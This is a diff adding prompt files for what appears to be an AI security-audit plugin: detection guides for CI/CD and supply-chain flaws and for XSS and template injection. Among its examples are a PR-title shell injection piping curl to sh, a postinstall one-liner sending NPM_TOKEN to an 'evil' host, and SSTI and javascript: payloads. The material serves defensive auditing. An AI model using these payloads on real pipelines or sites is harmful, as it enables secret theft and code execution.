+    `resolutions`/`overrides`), `package-lock.json`, `yarn.lock`, `pnpm-lock.yaml`,
+    `.npmrc`.
+  - **Python:** `requirements*.txt`, `pyproject.toml` (`[project.dependencies]`,
+    `[tool.poetry]`), `Pipfile`/`Pipfile.lock`, `poetry.lock`, `setup.py`/`setup.cfg`.
+  - **Ruby:** `Gemfile`, `Gemfile.lock`, `*.gemspec`.
+  - **Crystal:** `shard.yml`, `shard.lock` (git deps via `github:`/`git:` + `branch:`/
+    `commit:`; a floating branch is unpinned).
+  - **Go:** `go.mod`, `go.sum` (`replace` directives pointing at forks/local paths),
+    `vendor/`.
+  - **PHP:** `composer.json`, `composer.lock`.
+  - **Java/Kotlin:** `pom.xml`, `build.gradle(.kts)`, `gradle/libs.versions.toml`,
+    `settings.gradle` (custom/insecure repositories).
+  - **Rust:** `Cargo.toml`, `Cargo.lock`, `[patch]`/`[replace]`, `build.rs`.
+  - **.NET:** `*.csproj`, `packages.config`, `nuget.config` (insecure feeds).
+- **Lifecycle / install / build scripts** (run at `install`/build time with whatever
+  privileges the developer/CI has):
+  - npm/yarn/pnpm lifecycle: `preinstall`, `install`, `postinstall`, `prepare`,
+    `prepublish`, `prepublishOnly` in `package.json` `scripts`; `node-gyp`/binary
+    download hooks; `.npmrc` `ignore-scripts=false`.
+  - Python: `setup.py` arbitrary code at install, `pyproject.toml` build backends,
+    `cffi`/`build_ext` custom commands, `conftest.py` auto-loaded by pytest in CI.
+  - Ruby: `*.gemspec` `extensions` / `ext/extconf.rb` native build; `Rakefile`
+    auto-run tasks.
+  - Rust: `build.rs` (runs arbitrary code at build), proc-macro crates.
+  - Go: `//go:generate` (runs only when `go generate` is invoked, e.g. by CI or a Makefile), cgo, `go:embed` of fetched content.
+  - Make/CMake/Gradle init scripts, `Dockerfile` `RUN curl ... | sh`.
+- **Artifact-fetch integrity:** `Dockerfile`/`docker-compose` base images by mutable
+  tag (`:latest`) vs digest; `RUN curl|wget ... | sh|bash`; downloads over plain
+  `http://`; `go install pkg@latest`, `pip install` from a git URL/branch,
+  `gem "x", git: ...` on a branch, `cargo install` from git; custom/insecure package
+  registries (`--index-url`, `source` blocks, `nuget.config` HTTP feeds).
+
+Grep signals (workflows): `pull_request_target`, `workflow_run`, `issue_comment`,
+`pull_request_review_comment`, `actions/checkout` with `ref:`/`head.sha`/`head.ref`,
+`${{ github.event.` (esp. `.pull_request.title`/`.body`/`.head.ref`/`.comment.body`/
+`issue.title`), `run:` blocks containing `${{`, `permissions:`, `write-all`,
+`contents: write`, `id-token: write`, `pull-requests: write`, `secrets:`,
+`GITHUB_TOKEN`, `uses: .*@(main|master|v?\d+(\.\d+)*)$` (tag/branch, not 40-hex SHA),
+`uses: ./` (local in-repo action), `runs-on: self-hosted`, `actions/github-script`, `tj-actions/`, `curl|sh`, `pull_request`
+with `secrets`. Manifests: version specifiers `^`/`~`/`*`/`latest`/`>=`/`branch:`,
+git URLs, `overrides`/`resolutions`, `replace`/`[patch]`, missing lockfile. Scripts:
+`postinstall`, `preinstall`, `prepare`, `build.rs`, `extconf.rb`, `setup.py`.
+
+## 3. Detection heuristics
+
+This class has three distinct taint shapes — frame every finding around which one.
+
+**Shape A — Dangerous CI/CD workflow (untrusted PR/event → code exec with secrets).**
+- **SOURCE** = an event a non-collaborator can trigger that runs in a *privileged*
+  context: `pull_request_target`, `workflow_run` (chained off a fork PR),
+  `issue_comment`, `pull_request_review_comment`, `discussion*`, or a scheduled/`push`
+  job that consumes PR-controlled state. Plus the attacker-controlled fields inside
+  the event: PR head `ref`/`sha`/branch name, PR title/body, comment body, issue
+  title, label/branch names.
+- **SINK** = (1) checking out and executing the fork's untrusted code (`actions/checkout`
+  with `ref: ${{ github.event.pull_request.head.sha|head.ref }}` followed by `npm
+  install`/`make`/`./script`/test that runs repo code) *in a job that holds secrets or
+  a write token*; or (2) a `${{ <attacker field> }}` expression interpolated directly
+  into a `run:` shell (script injection) / into `actions/github-script` JS.
+- Vulnerable patterns to confirm:
+  - **`pull_request_target` + untrusted checkout:** `on: pull_request_target` (runs with
+    the *base* repo's secrets and a read/write token) that does
+    `uses: actions/checkout@... with: ref: ${{ github.event.pull_request.head.ref }}`
+    then builds/tests/installs — the fork's code (incl. its `package.json`
+    `postinstall`, its build scripts) executes with access to `secrets.*` and
+    `GITHUB_TOKEN`. Same trap via `workflow_run` triggered by the fork's
+    `pull_request` workflow, then checking out / downloading the fork's artifact.
+  - **`${{ }}` script injection:** any attacker-controlled event field interpolated
+    into `run:`/`script:`/`github-script`. Canonical:
+    `run: echo "${{ github.event.pull_request.title }}"` — a PR title of
+    `"; curl evil|sh #` breaks out of the shell string and runs in CI. Likewise
+    `${{ github.event.issue.title }}`, `${{ github.head_ref }}` (branch name with
+    backticks/`$()`), `${{ github.event.comment.body }}`,
+    `${{ github.event.review.body }}`. The expansion happens *before* the shell sees
+    it, so shell quoting in the YAML does not save you.
+  - **Self-hosted runner on public-repo fork PRs:** fork PRs landing on a
+    self-hosted runner = arbitrary code on your infra.
+- **GitLab/others:** `rules`/`only` that run on merge-request pipelines from forks with
+  protected variables exposed; `Jenkinsfile` building untrusted PR branches with
+  credentials bound; CircleCI fork-PR builds with secrets passed ("Pass secrets to builds from forked pull requests" enabled) or comment-triggered jobs.
+
+**Shape B — Over-broad / leaked CI permissions (amplifies A, or is the bug itself).**
+- **SINK** = a `GITHUB_TOKEN` with more scope than the job needs, reachable by attacker
+  code from Shape A or by a compromised dependency running in the job:
+  - No top-level `permissions:` block (default is often `write-all`/broad on older
+    repos), or `permissions: write-all`, or `contents: write` / `packages: write` /
+    `id-token: write` (OIDC cloud creds) / `pull-requests: write` /
+    `actions: write` granted to a job that also runs untrusted/third-party code.
+  - Secrets (`secrets.*`, cloud keys, npm publish token) exposed as `env:` in a job
+    that checks out or executes untrusted PR code or an unpinned third-party action.
+  - A reusable/third-party action receiving `secrets: inherit`.
+- This is only a *finding* when the broad token/secret is reachable by code an attacker
+  controls (a fork checkout, a `${{}}` injection, or an unpinned mutable action that
+  could be swapped) — not merely "scope is wider than ideal" with no untrusted code in
+  the job. Tie it to a concrete reach path.
+
+**Shape C — Untrusted/compromisable component reaches build or runtime.**
+- **SOURCE** = a package/Action/image the project pulls whose *content can change under
+  an attacker* (mutable ref, registry takeover, typosquat, dependency confusion) or is
+  *already known-exploitable*.
+- **SINK** = code execution at install/build time, or invocation of a vulnerable API in
+  a reachable code path.
+- Vulnerable patterns to confirm:
+  - **Unpinned GitHub Action (mutable ref):** `uses: some/action@v3` or `@main` — tags
+    and branches are movable; a compromised maintainer or tag re-point runs new code in
+    your pipeline with your token/secrets. The famous `tj-actions/changed-files`
+    incident is exactly this. *Pinned* = full 40-char commit SHA. Self-`uses: ./local`
+    is fine (in-repo).
+  - **Malicious / dangerous lifecycle script (CWE-506):** a `postinstall`/`preinstall`/
+    `prepare` (npm), `build.rs` (Rust), `setup.py` install hook, gemspec `extensions`,
+    or `Makefile`/`Dockerfile` `RUN curl ... | sh` that exfiltrates env/secrets, phones
+    home, downloads+executes remote code, or runs obfuscated payloads. Read the actual
+    script: look for `curl`/`wget`/`fetch` piped to a shell or `eval`, base64/hex
+    blobs, `child_process`/`os.system`/`exec` touching `process.env`/`~/.npmrc`/
+    `~/.aws`, network calls to odd hosts. (A first-party build hook that only compiles
+    local source is NOT this.)
+  - **Known-vulnerable dependency, reachable (CWE-1104/1357):** a pinned version in a
+    lockfile that an OSV/GHSA query flags as vulnerable AND the vulnerable function is
+    invoked by the app's own code on a path that can receive untrusted input. E.g. a
+    `lodash` prototype-pollution CVE where the app calls `_.merge(target, req.body)`; a
+    `log4j`/`Log4Shell` (`CVE-2021-44228`) version with user-controlled log strings; a
+    `Pillow`/`libxml`/`marshmallow`/`urllib3`/`requests` advisory whose vulnerable code
+    path the app exercises. Use the lockfile's exact version, the advisory's affected
+    range, and a real call site. (A CVE in a transitive dep that the app never reaches,
+    or a dev-only tool, is at most Low/Info — see §4.)
+  - **Typosquat / dependency confusion (CWE-829):** a dependency name that shadows an
+    internal/private package (no scope, public registry resolves it) or is one keystroke
+    off a popular package (`lodahs` for `lodash`, `crossenv` for `cross-env`, `python3-dateutil` for `python-dateutil`).
+    Confirm the name is suspect AND the registry/resolution actually pulls the public/
+    attacker copy.
+  - **Insecure fetch / mutable base image:** `Dockerfile FROM node:latest` (mutable) or
+    a base by tag with no digest; `RUN curl http://... | sh` (plaintext + execute);
+    `pip install` / `go install ...@latest` / `gem ... git:` on a moving branch; a
+    package source over `http://` or an untrusted custom registry without integrity.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **The workflow trigger runs only trusted code / can't reach secrets.** Plain
+  `on: pull_request` (NOT `_target`) from a fork runs with a *read-only* `GITHUB_TOKEN`
+  and **no** repo secrets by default — executing fork code there is the intended,
+  unprivileged path; it is not a finding unless secrets are explicitly injected or it's
+  on a self-hosted runner. A `pull_request_target` job that checks out the *base* repo
+  (default `ref`, or `ref: ${{ github.sha }}`/`github.event.pull_request.base.sha`) and
+  never runs fork code is safe — verify the `ref:`.
+- **`${{ }}` value is trusted or safely passed.** The expression references a non-attacker
+  field (`github.sha`, `github.repository`, `secrets.*`, `github.run_id`, a `vars.*`
+  set by maintainers) — no injection. OR the attacker field is passed via an intermediate
+  `env:` var and the shell references `"$ENVVAR"` (quoted) — that is the documented safe
+  pattern; the dangerous form is direct `${{ }}` *inside* the `run:` string. OR it's used
+  in a context that isn't a shell/JS sink (e.g. `if:` comparison, a `with:` input to an
+  action that treats it as data). Confirm the field is attacker-controlled AND lands in a
+  shell/`eval`/`script` sink un-indirected.
+- **Token scope is already least-privilege for the work in the job, or no untrusted code
+  shares the job.** A top-level `permissions: read-all`/`contents: read`, or per-job
+  `permissions:` granting only what that job needs, is correct — don't flag width that
+  matches the task. `contents: write` on a release job that runs only first-party pinned
+  steps is fine. The finding requires untrusted/swappable code co-resident with the broad
+  token.
+- **Action / dependency is effectively pinned or integrity-checked.** Action pinned to a
+  full 40-hex commit SHA (`@a1b2c3...`); dependency pinned to an exact version with a
+  committed lockfile and integrity hashes (`package-lock.json` `integrity:`,
+  `Cargo.lock`, `go.sum`, `Gemfile.lock`, `pnpm-lock.yaml` with `--frozen-lockfile` in CI);
+  Docker base by `@sha256:` digest. A `^`/`~` range in `package.json` is *resolved and
+  locked* by the committed lockfile — that's acceptable; flag unpinned only when there's
+  no lockfile, or CI installs without `--frozen-lockfile`/`npm ci`, or the ref is truly
+  mutable (branch/`latest`/tag-only Action). Range-without-lockfile or a re-resolving
+  install IS a finding.
+- **Lifecycle script is first-party and benign.** A `postinstall` that compiles the
+  project's own native addon, runs `husky install`, or builds local TypeScript — reads no
+  secrets, fetches no remote code, no obfuscation. `build.rs`/`extconf.rb` that only
+  compiles vendored/local source. Read it and confirm it does nothing network/exec on
+  untrusted input. (`ignore-scripts=true` in `.npmrc` also neutralizes third-party
+  install scripts — note it as a mitigation.)
+- **Vulnerable dependency is unreachable, dev-only, or already patched.** The CVE's
+  vulnerable function is never called by app code, or only by a `devDependencies` /
+  test / build tool not shipped or not exposed to untrusted input; OR the locked version
+  is *outside* the advisory's affected range (read the range precisely — off-by-one here
+  is the #1 false positive); OR an `overrides`/`resolutions`/`[patch]`/`replace` already
+  forces a fixed version. A version that merely "could be newer" with no advisory and no
+  sink is NOT a finding — that's hygiene → Info appendix.
+- **Posture/process, not an exploit path.** Missing SBOM, no `SECURITY.md`, no
+  Dependabot/Renovate, no signed commits, low maintainer count, missing branch
+  protection *as a standalone observation* → Info appendix per AGENTS.md, never the body.
+  (OSSF Scorecard hygiene checks belong here; only its code-exploitable checks —
+  Dangerous-Workflow, Token-Permissions, Pinned-Dependencies *with a reach path*,
+  reachable Vulnerabilities — are body findings.)
+- **The workflow/manifest is dead or not in the default branch.** A disabled/orphaned
+  workflow, a fixture, or one not triggered by any reachable event.
+
+If a "mitigation" is bypassable — a `pull_request_target` that *claims* to check out base
+but a later step re-checks-out the head; an `env:`-indirection that the `run:` still reads
+back via `${{ env.X }}` (expanded before the shell runs) rather than `"$X"`; a lockfile present but CI runs `npm install` (re-resolves) instead of
+`npm ci`; an `overrides` that pins the direct dep but the vuln is reached transitively
+elsewhere; an Action "pinned" to a tag a third party can move — it is NOT a mitigation.
+Flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated/any-fork attacker → arbitrary code execution in CI with
+  access to **production-impacting secrets or a write/publish token or OIDC cloud creds**:
+  `pull_request_target` (or `workflow_run`) checking out and executing fork code in a job
+  holding `secrets.NPM_TOKEN`/cloud keys/`id-token: write`; `${{ }}` script injection in
+  such a job; a malicious `postinstall` in a shipped/CI-run dependency that exfiltrates
+  those secrets; a remotely-exploitable known-vuln dep (e.g. Log4Shell) reachable with
+  untrusted input on a network-facing path. Also: a swappable third-party Action in a
+  job with a publish token (effective supply-chain RCE).
+- **High** — code execution in CI with a write-scoped `GITHUB_TOKEN` but no high-value
+  external secret (still allows tampering with the repo / releases / pushing commits);
+  script injection / untrusted checkout in a job with `contents: write` but no cloud
+  creds; an unpinned mutable Action co-resident with a write token; a known-exploitable
+  reachable dep CVE requiring authentication or non-default conditions; dependency
+  confusion/typosquat that resolves to a public name shadowing an internal package.
+- **Medium** — over-broad token reachable only under narrower conditions; unpinned Action
+  in a read-only job (tampering limited); a reachable dep vuln of moderate impact
+  (limited DoS, info leak) or one needing unusual config; mutable base image / `curl|sh`
+  fetch with no signature where the source is reputable-but-unverified.
+- **Low/Info** — unpinned dependency/Action with **no** reachable secret or untrusted-code
+  co-residency (pure pinning hygiene), a CVE in an unreached/dev-only dep, plaintext
+  `http://` fetch of non-executable data, "could upgrade" without an advisory. Pure
+  posture (no SBOM/SECURITY.md/Dependabot, maintainership) → **Info appendix only**.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup; e.g. one finding for "all jobs lack a
+`permissions:` block" listing the files in `rationale`, not one per job). Fields:
+
+```json
+{
+  "id": "supply-chain-001",
+  "title": "pull_request_target checks out & builds fork code with NPM_TOKEN in scope",
+  "vuln_class": "supply-chain",
+  "owasp": "A03:2025",
+  "cwe": "CWE-829",
+  "asvs": "V15",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": ".github/workflows/pr-build.yml",
+  "line": 7,
+  "end_line": 24,
+  "code_excerpt": "on:\n  pull_request_target:\n...\n      - uses: actions/checkout@v4\n        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n      - run: npm ci && npm test\n        env:\n          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}",
+  "source": "Any GitHub user opens a PR from a fork; pull_request_target runs in the BASE repo's privileged context (repo secrets + read/write GITHUB_TOKEN). Attacker controls the checked-out head.sha (their fork's code, incl. its package.json postinstall).",
+  "sink": "actions/checkout of head.sha then `npm ci`/`npm test` executes the fork's arbitrary code (lifecycle scripts + test code) in a job where secrets.NPM_TOKEN and GITHUB_TOKEN are present.",
+  "data_flow": "fork PR -> pull_request_target trigger (privileged) -> checkout ref: head.sha (untrusted) -> npm ci runs fork's postinstall + test runs fork's code -> code reads process.env.NPM_TOKEN / GITHUB_TOKEN and exfiltrates. No guard between checkout-of-head and secret-bearing run.",
+  "sanitizers_checked": "trigger is pull_request_target (privileged), NOT plain pull_request; checkout ref is head.sha (untrusted fork), NOT base.sha; no `if:` gating to trusted authors / labels-after-review; secrets explicitly injected as env in the same job; no `permissions:` narrowing (token is read/write); not a self-`./` action.",
+  "rationale": "Textbook dangerous-workflow: privileged trigger + untrusted checkout + secrets in job = full secret exfiltration / npm package takeover by any anonymous PR author. Same pattern also in .github/workflows/label.yml:12.",
+  "exploit_sketch": "Fork the repo; add to package.json: \"postinstall\":\"node -e 'require(\\\"https\\\").get(`https://evil/?t=`+process.env.NPM_TOKEN)'\"; open a PR. The pull_request_target job checks out my fork at head.sha and runs npm ci, executing postinstall with NPM_TOKEN in env — token exfiltrated; I publish a malicious version of the package.",
+  "dynamic_poc_plan": "On an isolated fork of the repo wired to a throwaway runner with a dummy SECRET, open a PR whose package.json postinstall writes process.env to the job log (or curls a local listener). Observe the workflow run executing the fork's postinstall and the dummy secret value appearing in the captured output — proving fork code runs with secret access. Never exfiltrate a real token off-box.",
+  "proposed_fix": "Untrusted fork code must never execute in a context that holds repo secrets or a write token: keep building/testing fork code on the unprivileged trigger and ensure any secret-bearing step only ever runs first-party base code. Direction only — the exact split/gating/permissions changes are for the engineer who picks this up; this is a high-level direction, not a patch."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, `sanitizers_checked` must be concrete and
+true. `source` = the untrusted origin (which fork/PR/event field, which attacker-publishable
+package, which mutable ref). `sink` = the precise dangerous op (the checkout+run that
+executes untrusted code, the `${{}}`-in-shell, the install-time `exec`, the call site of
+the vulnerable API). `data_flow` = how the untrusted thing reaches the sink and why no
+guard stops it (name the trigger, the `ref:`, the token scope, the lockfile/pinning state).
+`sanitizers_checked` = the §4 FP guard made explicit — confirm the trigger is privileged
+(not plain `pull_request`), the checkout is head-not-base, the `${{}}` is direct-not-
+env-indirected, the Action is tag-not-SHA, the lockfile is absent / CI re-resolves, the
+CVE version is *inside* the affected range and the function is reached — and state each as
+absent or name the bypass. Pick `cwe` by shape: 829 untrusted checkout / dependency
+confusion / external-code inclusion, 506 embedded malicious lifecycle script, 1104
+unmaintained/known-vuln component, 1357 insufficiently-trustworthy component (mutable
+Action/image, typosquat). Use `status:"likely"` for a proven static trace (privileged
+trigger + untrusted reach, or locked-vuln-version + reachable call site), `"confirmed"`
+only after dynamic repro, `"triage"` if reachability/privilege/version-range is uncertain
+(e.g. can't confirm the CVE function is called, or unsure the runner is self-hosted).
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the *running* pipeline or build executes untrusted code with the claimed
+privilege, or that a vulnerable dependency is actually reachable. Work only against an
+isolated copy/fork wired to a throwaway runner and **dummy** secrets — never exfiltrate a
+real token or mutate a real registry/account.
+
+- **Dangerous workflow (Shape A).** Clone the repo into an isolated fork with a
+  self-hosted/ephemeral runner and a placeholder secret (`SECRET=poc-canary-<nonce>`).
+  Trigger the workflow the attacker's way: open a PR from a fork whose `package.json`
+  `postinstall` (or whatever the job runs) echoes `process.env`/`$SECRET` to the job log
+  or to a local listener. **Proof:** the workflow run shows the fork's code executing and
+  the canary secret value appearing in the captured log / listener — fork code ran with
+  secret access. For self-hosted-runner exposure, show a benign `id`/`hostname` command
+  from fork code running on your infra.
+- **`${{ }}` script injection.** Open a PR / comment whose injected field carries a benign
+  command, e.g. PR title `` x"; echo INJECTED-<nonce> > $GITHUB_WORKSPACE/poc; # `` (or a
+  branch name with `$(echo INJECTED)`). **Proof:** the job log shows `INJECTED-<nonce>` /
+  the `poc` file exists — the title broke out of the shell string and executed. Keep the
+  payload to a harmless marker.
+- **Over-broad token (Shape B).** Within the above fork-code execution, use the
+  `GITHUB_TOKEN` to perform a write the job shouldn't need on the *throwaway* repo (e.g.
+  create a benign issue/label via the API, or push a no-op commit to a scratch branch).
+  **Proof:** the API call returns 2xx — the token is write-scoped and reachable by
+  untrusted code. Revert the change.
+- **Malicious / dangerous lifecycle script (Shape C).** In an isolated container, run the
+  install with scripts enabled (`npm ci` / `cargo build` / `pip install .`) under an
+  egress monitor (`strace -f -e trace=network`, a sinkhole DNS, or a local capture
+  proxy). **Proof:** the script makes an unexpected outbound connection, reads
+  `process.env`/`~/.npmrc`/`~/.aws`, or decodes+executes a remote/obfuscated payload —
+  captured in the trace. Compare against `--ignore-scripts` to confirm the script is the
+  vector.
+- **Unpinned mutable Action / base image.** Demonstrate mutability: show the `@v3`/`@main`
+  ref resolves to a SHA you do not control and that re-pointing the tag/branch (or a
+  registry-side re-push for a `:latest` image) would change what runs — in the isolated
+  fork, point the `uses:` at a fork-controlled copy of the action at the same tag and
+  show your code runs in the pipeline. **Proof:** attacker-controlled action code executes
+  with the job's token.
+- **Known-vulnerable dependency (reachable).** Confirm the locked version is in the
+  advisory's affected range (`npm ls <pkg>`/`pip show`/`bundle list`/`go list -m`), then
+  boot the app and send the vuln's trigger to the reachable endpoint (e.g. a
+  prototype-pollution body to the route that calls `_.merge(target, req.body)`; a JNDI lookup
+  string to a field that gets logged by the vulnerable log4j). **Proof:** observe the
+  vulnerability's effect (polluted property changing app behavior, the OOB JNDI/HTTP
+  callback firing, the crash/leak the CVE describes) — proving the dep is both vulnerable
+  *and* reached. Use a benign OOB nonce, never a real exploit payload.
+
+Record the exact trigger/command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). The workflow run
+executing fork code with a dummy secret in the log, the injected marker appearing, the
+token write succeeding, the install-time egress capture, or the dep's effect firing on a
+live route each prove the class — set `method:"live-exploit"`. If a runner/registry/app
+can't be stood up, fall back to a static trace (privileged trigger + untrusted `ref:` and
+in-scope secrets; or locked-affected-version + a concrete reachable call site) and set
+`method:"static-poc"`, `status:"likely"`, noting the gap. NEVER exfiltrate real secrets,
+publish to a real registry, or run a real exploit against third-party infrastructure to
+prove a finding — a dummy-secret/benign-marker repro is sufficient and required.
diff --git a/plugins/security/prompts/finders/xss-ssti.md b/plugins/security/prompts/finders/xss-ssti.md
new file mode 100644
index 0000000..5450a75
--- /dev/null
+++ b/plugins/security/prompts/finders/xss-ssti.md
@@ -0,0 +1,300 @@
+<!--
+FINDER PROMPT — xss-ssti. You are a fresh-context auditor hunting ONE class:
+XSS & Template Injection. Read the target's code; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE untrusted-input →
+HTML/JS/template sink with no effective escaping/sanitizer on the path is a
+finding. No defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — XSS & Template Injection (xss-ssti)
+
+**Class key:** `xss-ssti` · **OWASP:** A05:2025 · **CWE:** CWE-79, CWE-1336, CWE-116 · **ASVS:** V1/V3
+
+## 1. Objective
+
+Find places where untrusted input reaches an HTML/JS/DOM rendering sink without
+contextually-correct escaping (XSS), or reaches a template engine as *template
+source* rather than *data* (SSTI). The bug is attacker bytes interpreted as
+markup, script, or template code — not just displayed as text.
+
+## 2. Where to look
+
+Entry points where a request value, stored record, or external payload becomes
+part of an HTML response, a DOM mutation, or a compiled template:
+
+- **Server-rendered views:** controllers/handlers that build HTML strings,
+  interpolate into templates, or pass user data to a view. Look at view files
+  (`.erb`, `.ecr`, `.haml`, `.slim`, `.ejs`, `.pug`, `.hbs`, `.jinja`/`.html`,
+  `.blade.php`, `.gohtml`/`.tmpl`, JSP/Thymeleaf) and any helper that emits
+  "raw"/"safe"/"unescaped" output.
+- **JSON/API → client render:** API returns user data that a SPA injects via
+  `innerHTML`/`v-html`/`dangerouslySetInnerHTML`; or server embeds user data
+  into an inline `<script>` JSON island (`<script>var d = {{ data }}</script>`).
+- **DOM XSS surfaces (client JS):** reads of `location.*`, `document.URL`,
+  `referrer`, `name`, `postMessage` data, `localStorage`, hash/query parsing,
+  flowing into `innerHTML`, `document.write`, `eval`, `setAttribute("href"...)`,
+  jQuery `.html()/.append()`, framework bypass APIs.
+- **Template-as-data confusion (SSTI):** user input used to *build* a template
+  string, choose a template name/path, or rendered inline (email/notification
+  templating, report builders, CMS "custom template" fields, `render inline:`,
+  Handlebars/Mustache where the *template* itself is user-supplied).
+- **Markdown/rich-text/SVG/email:** Markdown→HTML renderers with raw-HTML
+  passthrough, WYSIWYG body stored then re-rendered (stored XSS), uploaded SVG
+  served inline, HTML email previews.
+- **Reflected surfaces:** error pages echoing the bad input, search-result
+  pages, `redirect`/`next` params written into `<a href>` or `<meta refresh>`,
+  filenames/headers reflected into HTML.
+- **Attribute / URL / JS-string contexts:** values placed inside `href`/`src`
+  (→ `javascript:` URIs), event-handler attributes, `style`, or inside an inline
+  script — each needs context-specific encoding, not just HTML-entity escaping.
+
+Per-language sink/render signals:
+
+- **Crystal:** ECR `<%= %>` is **not** auto-escaped (raw by default — safe only
+  as `<%= HTML.escape(x) %>`); Kemal/Lucky raw helpers, `env.response.print`
+  of interpolated HTML, `String#to_s` into ECR without `HTML.escape`.
+- **Ruby:** `raw`, `.html_safe`, `<%== %>` (Erubi raw), `sanitize`
+  misuse, `content_tag` with raw, `render inline: params[...]`, ERB.new on user
+  string, Slim/Haml `==`, `raw()` in Sinatra; SSTI via Liquid/ERB template
+  source from input.
+- **Node/TS:** `res.send("<...>"+x)`, `dangerouslySetInnerHTML={{__html:x}}`
+  (React), `v-html` (Vue), `[innerHTML]` (Angular) / `bypassSecurityTrustHtml`,
+  `el.innerHTML=`, `document.write`, EJS `<%- %>`, Pug `!{}`/`unescaped`,
+  Handlebars triple-stash `{{{ }}}` or `SafeString`, `_.template`, Nunjucks
+  `{% autoescape false %}` / `| safe`; SSTI via `new Function`,
+  `eval`, `vm.runInNewContext`, or template compiled from user string.
+- **Python:** Jinja2 `| safe`, `Markup(x)`, `{% autoescape false %}`,
+  `render_template_string(user)` (classic SSTI), `flask.Markup`, Django
+  `mark_safe`, `format_html` misuse, `{% autoescape off %}`, f-string/`%`/
+  `.format` building a template then `Template(s).render(...)`, Mako default
+  (no auto-escape).
+- **Go:** `text/template` (NO auto-escaping — XSS by design if HTML output),
+  `template.HTML(x)` / `template.JS` / `template.URL` (bypass `html/template`
+  escaping), `fmt.Fprintf(w, "<...>"+x)`, `w.Write([]byte("<b>"+x))`.
+- **PHP:** `echo $_GET[...]`, `print`, string interpolation into HTML,
+  `Twig` `|raw` / `autoescape false`, Blade `{!! !!}` (unescaped) vs `{{ }}`,
+  Smarty `{$x nofilter}`; SSTI via `eval`, `create_function`, Twig template
+  from user string.
+- **Java/JVM:** JSP `<%= %>` (unescaped) / `<c:out escapeXml="false">`,
+  Thymeleaf `th:utext` (unescaped) vs `th:text`, FreeMarker/Velocity with user
+  template source (SSTI), `response.getWriter().print(req.getParameter(...))`,
+  Spring `@ResponseBody` returning raw HTML, JSF EL `${param.x}` rendered.
+- **Rust:** `askama`/`maud` are escaped by default — flag `| safe`-equivalents,
+  `PreEscaped`/`Markup` (maud) wrapping user data, `Html(format!("<b>{}",x))`
+  in axum/actix, `tera` `| safe` / `autoescape` disabled, raw `write!` of HTML.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path/header values (incl.
+`Referer`, `User-Agent`, `X-Forwarded-*`, `Host`), cookies, uploaded file
+names/contents, **stored DB rows that were user-set** (stored XSS — the highest-
+value variant), webhook/queue payloads, `location.href`/`hash`/`search`,
+`document.referrer`, `window.name`, `postMessage` `event.data`, `localStorage`/
+`sessionStorage`, and any value derived from these.
+
+**Taint SINKS** (dangerous op): the render/DOM/template calls in §2 where the
+output is *interpreted* (parsed as HTML, executed as JS, or compiled as a
+template) rather than emitted as inert text. The decisive question is **does an
+effective, context-correct encoder sit between source and sink?**
+
+Vulnerable patterns to confirm (real APIs):
+
+- **Reflected XSS — direct echo:**
+  - Node: ``res.send(`<h1>${req.query.q}</h1>`)``
+  - PHP: `echo "Hello ".$_GET['name'];`
+  - Python: `return f"<p>{request.args['q']}</p>"` (no template escaping)
+  - Go: `fmt.Fprintf(w, "<div>%s</div>", r.FormValue("q"))`
+  - Java: `out.print("<p>"+request.getParameter("q")+"</p>");`
+- **Disabled / bypassed auto-escaping in a template:**
+  - Ruby: `<%= params[:bio].html_safe %>` / `raw user.bio`
+  - Jinja2: `{{ user.bio | safe }}` / `Markup(user.bio)` / `{% autoescape off %}`
+  - React: `<div dangerouslySetInnerHTML={{__html: comment.body}} />`
+  - Vue: `<div v-html="comment.body">` ; Angular: `[innerHTML]="body"` after
+    `bypassSecurityTrustHtml(body)`
+  - Handlebars: `{{{ body }}}` ; EJS: `<%- body %>` ; Blade: `{!! $body !!}` ;
+    Thymeleaf: `th:utext="${body}"`
+  - Go: `template.HTML(userData)` passed to `html/template`
+- **DOM XSS:**
+  - `el.innerHTML = location.hash.slice(1)`
+  - `document.write(new URLSearchParams(location.search).get("q"))`
+  - `$("#out").html(userInput)` ; `eval(location.hash)` ;
+    `a.href = userInput` (→ `javascript:alert(1)`)
+- **Server-Side Template Injection (CWE-1336) — user controls the template, not
+  the data:**
+  - Python/Flask: `render_template_string("Hi "+request.args["name"])` →
+    payload `{{7*7}}`/`{{config}}`/`{{request.application...}}` → RCE on Jinja2.
+  - Ruby: `ERB.new(params[:tpl]).result(binding)` / `render inline: params[:t]`
+  - Node: `handlebars.compile(req.body.tpl)` ; `_.template(userTpl)` ;
+    ``new Function("return `"+userTpl+"`")()``
+  - Java: FreeMarker `new Template("t", new StringReader(userTpl), cfg)` ;
+    Velocity `Velocity.evaluate(ctx, w, "t", userTpl)`
+  - PHP: Twig `$twig->createTemplate($_GET['t'])->render()`
+  - Signal: input is concatenated/passed where a *template literal/string* is
+    expected, or selects the template name (`render(params[:view])` →
+    traversal/engine-specific injection).
+- **Wrong-context encoding (encoded but still injectable):** HTML-entity escaped
+  but placed inside an event-handler JS string (`onclick="f('{{ q }}')"` → entities
+  decode before JS runs), inside an unquoted attribute (` onmouseover=...`), or inside
+  `href`/`src` (entity-escaping does not stop `javascript:`/`data:` URIs).
+- **Unsafe sanitizer config / raw passthrough in Markdown:** `marked` with
+  `sanitize:false` (or modern `marked` which dropped sanitize — needs external
+  sanitizer), `markdown-it({html:true})`, Python `markdown` with no bleach,
+  `Redcarpet.new(..., filter_html: false)`, Goldmark with `WithUnsafe()`.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective for the **specific output
+context**:
+
+- **Framework auto-escaping left ON, value emitted through the escaped path:**
+  Rails ERB `<%= %>` (auto-escapes), React `{value}` (JSX text — escaped), Vue
